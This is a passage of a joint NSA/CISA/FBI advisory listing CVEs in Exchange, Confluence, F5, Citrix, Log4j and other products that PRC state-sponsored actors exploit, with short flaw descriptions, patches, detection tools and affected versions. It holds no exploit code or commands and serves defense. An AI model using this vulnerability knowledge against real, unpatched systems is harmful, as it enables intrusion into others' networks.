vCenter Server\n\n| \n\nCVE-2021-22005\n\n| \n\nArbitrary File Upload \n \nCitrix ADC\n\n| \n\nCVE-2019-19781\n\n| \n\nPath Traversal \n \nCisco Hyperflex\n\n| \n\nCVE-2021-1497\n\n| \n\nCommand Line Execution \n \nBuffalo WSR\n\n| \n\nCVE-2021-20090\n\n| \n\nRelative Path Traversal \n \nAtlassian Confluence Server and Data Center\n\n| \n\nCVE-2021-26084\n\n| \n\nRemote Code Execution \n \nHikvision Webserver\n\n| \n\nCVE-2021-36260\n\n| \n\nCommand Injection \n \nSitecore XP\n\n| \n\nCVE-2021-42237\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2022-1388\n\n| \n\nRemote Code 
Execution \n \nApache\n\n| \n\nCVE-2022-24112\n\n| \n\nAuthentication Bypass by Spoofing \n \nZOHO\n\n| \n\nCVE-2021-40539\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26857\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-26858\n\n| \n\nRemote Code Execution \n \nMicrosoft\n\n| \n\nCVE-2021-27065\n\n| \n\nRemote Code Execution \n \nApache HTTP Server\n\n| \n\nCVE-2021-41773\n\n| \n\nPath Traversal \n \nThese state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Many of the CVEs indicated in Table 1 allow the actors to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. For additional information on PRC state-sponsored cyber actors targeting network devices, please see [People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/>).\n\n### Mitigations\n\nNSA, CISA, and FBI urge organizations to apply the recommendations below and those listed in Appendix A.\n\n * Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices.\n * Move toward the Zero Trust security model. 
\n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\n\n## Appendix A\n\n_Table II: Apache CVE-2021-44228_\n\nApache CVE-2021-44228 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nApache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against malicious actor controlled LDAP and other JNDI related endpoints. A malicious actor who can control log messages or log message parameters could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * See vendor\u2019s [Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>). \n \n_Vulnerable Technologies and Versions_\n\nThere are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, check <https://nvd.nist.gov/vuln/detail/CVE-2021-44228>. \n \n_Table III: Pulse CVE-2019-11510_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. 
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote malicious actor could send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_Recommended Mitigations_\n\n * Apply patches provided by vendor and perform required system updates. \n \n_Detection Methods_\n\n * Use CISA\u2019s \u201cCheck Your Pulse\u201d Tool. \n \n_Vulnerable Technologies and Versions_\n\nPulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n \n_Table IV: GitLab CVE-2021-22205_\n\nGitLab CVE-2021-22205 CVSS 3.0: 10 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nAn issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files passed to a file parser, which resulted in a remote command execution. \n \n_Recommended Mitigations_\n\n * Update to 12.10.3, 13.9.6, and 13.8.8 for GitLab.\n * Hotpatch is available via GitLab. \n \n_Detection Methods_\n\n * Investigate logfiles.\n * Check GitLab Workhorse. \n \n_Vulnerable Technologies and Versions_\n\nGitlab CE/EE. \n \n_Table V: Atlassian CVE-2022-26134_\n\nAtlassian CVE-2022-26134 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that could allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, 7.13.0 before 7.13.7, 7.14.0 before 7.14.3, 7.15.0 before 7.15.2, 7.16.0 before 7.16.4, 7.17.0 before 7.17.4, and 7.18.0 before 7.18.1. \n \n_Recommended Mitigations_\n\n * Immediately block all Internet traffic to and from affected products AND apply the update per vendor instructions. \n * Ensure Internet-facing servers are up-to-date and have secure compliance practices. 
\n * Short term workaround is provided [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAll supported versions of Confluence Server and Data Center\n\nConfluence Server and Data Center versions after 1.3.0 \n \n_Table VI: Microsoft CVE-2021-26855_\n\nMicrosoft CVE-2021-26855 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. 
\n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. 
A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n \n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. 
\n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. 
Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. 
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. 
\n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. 
\n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. 
If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-06T12:00:00", "type": "ics", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", 
"CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134", "CVE-2023-27350"], "modified": "2022-10-06T12:00:00", "id": "AA22-279A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}